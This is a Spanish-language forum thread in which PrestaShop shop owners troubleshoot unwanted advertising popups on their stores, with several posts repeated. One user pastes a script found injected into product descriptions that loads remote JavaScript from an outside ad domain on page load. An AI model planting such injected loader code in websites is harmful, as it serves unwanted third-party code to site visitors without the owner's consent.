Jump to content

Recommended Posts

Hola,

Ayer publiqué la tienda y hechas algunas pruebas con amigos me he encontrado con que a dos personas le ha pasado lo siguiente: al navegar por los productos le aparecen unos popup de publicidad que nada tiene que ver con mi tienda y mis productos. Alguien sabe porqué pasa esto? La impresión es malísima. Adjunto un par de pantallazos de lo que pasa:

post-453952-0-50093900-1369224316_thumb.png

post-453952-0-58951200-1369224327_thumb.png

Alguien podría ayudarme?

Mil gracias de antemano!

Carlos

Hola,

Ayer publiqué la tienda y hechas algunas pruebas con amigos me he encontrado con que a dos personas le ha pasado lo siguiente: al navegar por los productos le aparecen unos popup de publicidad que nada tiene que ver con mi tienda y mis productos. Alguien sabe porqué pasa esto? La impresión es malísima. Adjunto un par de pantallazos de lo que pasa:

post-453952-0-50093900-1369224316_thumb.png

post-453952-0-58951200-1369224327_thumb.png

Alguien podría ayudarme?

Mil gracias de antemano!

Carlos

Pues yo he entrado a tu tienda y a simple visto no me ha saltado "nada".

Quizas sea algun complemento/plugin que tengan esas 2 personas instaladas en su equipo..

¿Le ha pasado a mas gente?

Gracias por interesarte.

Por ahora sólo sé de 2 personas a las que les haya pasado, y sólo les pasa con mi página.

Estoy dándole vueltas qué puede pasar. Se me ocurre que sea algún módulo que instalé que me la esté jugando. Otra idea es que uso un alojamiento compartido, y no sé si eso puede afectarme. La verdad, estoy un poco perdido, pero esto creo que perjudica mucho a la imagen de una tienda.

A alguien se le ocurre algo?

Gracias por la ayuda!

Carlos

• 2 weeks later...

Hola,estaba loco buscando este tema creía que era el único.

Pues no,¿Que alivio?

El caso se me da en la inyección en la descripción larga del producto al final de ella.

Y lo encontré con el firebug y lo elimine es:

----------------------------

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);[spam-filter];h.appendChild(s);}catch(ex){[spam-filter]();// ]]></script>

----------------------------------

Lo borro y soluciono el problema

Pensé que alguien por error había copiado y pegado hasta el script

Pero no:

Se vuelve ha repetir en forma aleatoria

en otros productos

Por lo que ya somos tres con el problema

Ayuda urgente

Hola,estaba loco buscando este tema creía que era el único.

Pues no,¿Que alivio?

El caso se me da en la inyección en la descripción larga del producto al final de ella.

Y lo encontré con el firebug y lo elimine es:

----------------------------

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);[spam-filter];h.appendChild(s);}catch(ex){[spam-filter]();// ]]></script>

----------------------------------

Lo borro y soluciono el problema

Pensé que alguien por error había copiado y pegado hasta el script

Pero no:

Se vuelve ha repetir en forma aleatoria

en otros productos

Por lo que ya somos tres con el problema

Ayuda urgente

Pues entonces, mirate esto: http://jordiob.com/2012/07/como-resolver-los-ataques-de-malware-yo-virus-a-prestashop/

Pues entonces, mirate esto: http://jordiob.com/2...s-a-prestashop/

He estado anteriormente en esa pagina pero no sale nada como malicioso no se como se podra detectar

me faltan los pasos del tpl

pero el escaner dio negativo al igual que google

o sea que no sale como software malo

en fin.

El problema es que es aleatorio

borro en uno y al tiempo sale en cualquier otro.

Lo peor es que lo detectamos los de la empresa

Sale igual que el amigo Carlos Montero

A la derecha

y en la parte de abajo del food

Guest
This topic is now closed to further replies.
  • Create New...